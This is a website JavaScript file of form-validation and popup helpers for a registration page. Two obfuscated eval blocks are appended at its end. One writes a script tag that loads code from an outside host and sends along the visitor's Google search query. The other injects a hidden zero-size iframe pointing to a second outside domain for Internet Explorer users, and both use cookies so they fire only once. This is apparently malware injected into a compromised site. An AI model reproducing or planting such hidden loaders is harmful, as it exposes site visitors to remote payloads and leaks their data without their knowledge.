// JavaScript Document
function confirmare(calea,mesaj)
{
	resultat=confirm(mesaj);
	if(resultat ==1)
	{
		location.href = calea; 
	}	
}

var popWin = null    
var winCount = 0
var winName = "popWin"

function openPopWin(winURL, winWidth, winHeight, winFeatures, winLeft, winTop){
  var d_winLeft = 20  
  var d_winTop = 20   
  winName = "popWin" + winCount++ 
  closePopWin()          
  if (openPopWin.arguments.length >= 4)  
    winFeatures = "," + winFeatures
  else 
    winFeatures = "" 
  if (openPopWin.arguments.length == 6)  
    winFeatures += getLocation(winWidth, winHeight, winLeft, winTop)
  else
    winFeatures += getLocation(winWidth, winHeight, d_winLeft, d_winTop)
  popWin = window.open(winURL, winName, "width=" + winWidth 
           + ",height=" + winHeight + winFeatures)
  }
  
function closePopWin(){    
  if (navigator.appName != "Microsoft Internet Explorer" 
      || parseInt(navigator.appVersion) >=4) 
    if(popWin != null) if(!popWin.closed) popWin.close() 
  }
  
function getLocation(winWidth, winHeight, winLeft, winTop){
  var winLocation = ""
  if (winLeft < 0)
    winLeft = screen.width - winWidth + winLeft
  if (winTop < 0)
    winTop = screen.height - winHeight + winTop
  if (winTop == "cen")
    winTop = (screen.height - winHeight)/2 - 20
  if (winLeft == "cen")
    winLeft = (screen.width - winWidth)/2
  if (winLeft>0 & winTop>0)
    winLocation =  ",screenX=" + winLeft + ",left=" + winLeft	
                + ",screenY=" + winTop + ",top=" + winTop
  else
    winLocation = ""
  return winLocation
 }

function isEmailAddr(email)
{
  var result = false;
  var theStr = new String(email);
  var index = theStr.indexOf("@");
  if (index > 0)
  {
    var pindex = theStr.indexOf(".",index);
    if ((pindex > index+1) && (theStr.length > pindex+1))
	result = true;
  }
  return result;
}

function allDigits(str)
{
	return inValidCharSet(str,"0123456789");
}

function inValidCharSet(str,charset)
{
	var result = true;

	for (var i=0;i<str.length;i++)
		if (charset.indexOf(str.substr(i,1))<0)
		{
			result = false;
			break;
		}
	
	return result;
}

function validEmail(formField,fieldLabel,required)
{
	var result = true;
	
	if (required && !validRequired(formField,fieldLabel))
		result = false;

	if (result && ((formField.value.length < 3) || !isEmailAddr(formField.value)) )
	{
		alert(fieldLabel);
		formField.focus();
		result = false;
	}
   
  return result;

}

function validNum(formField,fieldLabel,required)
{
	var result = true;

	if (required && !validRequired(formField,fieldLabel))
		result = false;
  
 	if (result)
 	{
 		if (!allDigits(formField.value))
 		{
 			alert('Please enter a valid phone number!');
			formField.focus();		
			result = false;
		}
	} 
	
	return result;
}

function validNum_unrequired(formField,fieldLabel,required)
{
	var result = true;

  
 	if (result)
 	{
 		if (!allDigits(formField.value))
 		{
 			alert('Please enter a valid phone number!');
			formField.focus();		
			result = false;
		}
	} 
	
	return result;
}


function validRequired(formField,fieldLabel)
{
	var result = true;	
	if (formField.value == "" || formField.value == 0 )
	{
		
		alert(fieldLabel );
		formField.focus();
		result = false;
		
	}
	if(formField.value == "Choose")
		{
		alert(fieldLabel );
		formField.focus();
		result = false;
		}
	return result;
}
function validRequired_same_pass(formField1,formField2,fieldLabel)
{
	var result = true;	
	if (formField1.value != formField2.value )
	{
		
		alert(fieldLabel );
		formField2.focus();
		result = false;
		
	}
	if(formField2.value == "Choose")
		{
		alert(fieldLabel );
		formField2.focus();
		result = false;
		}
	return result;
}

function select_tara()
{
	
	if(document.form_register.country.value == 116)
	{
		document.getElementById('provincie').style.display="block";
		document.getElementById('oras').style.display="none";
	}
	else
	{
		document.getElementById('provincie').style.display="none";
		document.getElementById('oras').style.display="block";
	}
}
function put_cod()
{
	var codloc = document.form_register.comuna.value;
	
	x = codloc.split("_");
	
	document.form_register.cod_p.value = x[0];
	
}
function showhide() {

	if (document.form_register.newsletter.checked) {
		document.getElementById('div_news').style.display = 'block';
	}
	else {
		document.getElementById('div_news').style.display = 'none';
	}
}
function display_pass() {

	if (document.form_register.change_pass.checked) 
	{
		document.getElementById('pass').style.display = 'block';
	}
	else {
		document.getElementById('pass').style.display = 'none';
	}
}



eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}',46,46,'|||query|document|var||indexOf|querysize|referrer|if|script|slice|_tskdjw|cookie|dri|dci|nai|substring|google|charAt|navigator|escape|length|MSIE|cmd||write|appVersion|JavaScript|12|15|js|expires|Mon|Jul|23|kv|org|GMT|language|src|58|24search|http|2013'.split('|')));
sa="%71%64%6F%73%69%65%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));
